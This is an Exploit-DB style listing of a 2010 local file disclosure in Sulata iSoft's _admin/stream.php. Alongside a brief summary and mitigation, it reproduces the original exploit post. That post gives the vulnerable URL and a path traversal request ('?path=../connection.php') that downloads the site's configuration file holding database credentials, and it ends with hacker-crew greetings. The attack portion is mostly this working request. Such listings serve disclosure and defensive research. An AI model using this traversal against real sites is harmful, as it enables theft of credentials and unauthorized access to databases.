Sulata iSoft (stream.php) Local File Disclosure Exploit

vendor:

stream.php

by:

Sudden_death

7,5

CVSS

HIGH

Local File Disclosure

CWE

Product Name: stream.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP 2 SP 2

2010

Sulata iSoft (stream.php) Local File Disclosure Exploit

Sulata iSoft (developer by Rizwan Azam) contains a vulnerability that allows an attacker to download and view the source file stream.php. The vulnerability is located in the _admin/stream.php file, which allows an attacker to download the connection.php file by appending the path parameter with '../connection.php'. This can be exploited to gain access to sensitive information such as database credentials.

Mitigation:

Ensure that the _admin/stream.php file is not accessible to unauthorized users and that the path parameter is properly validated.

Source

Exploit-DB raw data:

=========================================================
Sulata iSoft (stream.php) Local File Disclosure Exploit
=========================================================

# Exploit Title     : Sulata iSoft (developer by Rizwan Azam) you look 
site.com/about.php
# Date              : 10 December 2010
# Author            : Sudden_death
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://sudden.isgreat.org
# dork              : your imagination
======================================================================
 
# vuln here
http://www.site.com/_admin/stream.php?path=

# try to download and watch source file stream.php
    .....
    //include_once("../home/library.php");
    include_once("../connection.php");    <----------------------- look here,, 
This is the config
    suConnect();
    .....

# after we know config, let us download
http://www.site.com/_admin/stream.php?path=../connection.php


[#]-------------------------------------------------------------------

Greets            :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | 
white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 
d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | 
r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | 
cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | scr34mz | Kimmonosz | 
pL4nkt0n | RxN7 | jos_ali_jo | 45tr0_k1ll1n9 | huda_style | zalezero | 
CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's 
yang ga bisa ane sebutin satu persatu |
Spesial thanks    : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | 
makassarhacker.com ]
 
note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap 
apa yang kau katakan!